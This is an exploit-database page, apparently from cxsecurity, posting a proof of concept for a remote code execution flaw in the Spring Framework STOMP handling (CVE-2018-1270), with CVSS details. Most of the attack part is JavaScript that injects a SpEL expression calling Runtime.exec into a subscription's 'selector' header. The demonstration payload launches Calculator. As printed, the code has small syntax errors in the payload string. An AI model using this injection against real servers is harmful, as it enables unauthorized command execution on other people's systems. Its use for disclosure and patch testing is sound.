Pivotal Spring Java Framework < 5.0 Remote Code Execution

2018.05.30
Credit: JameelNabbo
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-358


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Pivotal Spring Java Framework < 5.0 - Remote Code Execution # Date: 2018-05-28 # Exploit Author: JameelNabbo # Website: jameelnabbo.com <http://jameelnabbo.com/> # Vendor Homepage: # https://pivotal.io/agile/press-release/pivotal-releases-spring-framework-for-modern-java-application-development # CVE: CVE: CVE-2018-1270 # Version: <= 5.0.x # Description: By connecting to spring STOMP, and putting the key for "selector" # header, we can execute code on Spring. # POC: # Here' we are writting java commands to be executed within the selector header # Connecting to a web socket using SockJS # Ref: https://docs.spring.io/spring/docs/current/spring-framework-reference/web.html#websocket-stomp-enable var header = {"selector":"T(java,lang.Runtime).getRuntime().exec('open -a Calculator"}; var socket = new SockJS('/gs-guide-websocket'); var stompClient = webstomp.over(socket); stompClient.connect({}, function (frame){ setConnected(true); console.log('Connected: ' + frame); stompClient.subscribe('/topic/greetings', function(greeting){ showGreeting(JSON.parse(greeting.body).content); },header); });


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top